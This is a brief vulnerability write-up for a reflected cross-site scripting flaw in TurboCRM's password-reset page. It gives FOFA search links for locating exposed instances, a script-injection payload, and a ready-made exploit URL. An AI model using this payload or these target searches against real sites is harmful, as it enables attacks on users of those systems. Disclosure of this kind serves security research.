### TurboCRM Allow XSS (cross site scripting)

### Dork
- https://fofa.so/result?qbase64=YXBwPSLnlKjlj4stVHVyYm9DUk0i
- https://fofa.so/result?qbase64=dGl0bGU9IueUqOWPiy1UdXJib0NSTSI%3D

### Payloads
`"><script>alert(/XSS/)</script>`

## Step To Reproduction
- 1. Open a website in Browser.
- 2. Go To path /login/forgetpswd.php?loginsys=1&orgcode={PAYLOADS}&loginname={PAYLOADS}
- 3. Press Enter to trigger the alert.

## Example:
http://IP/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E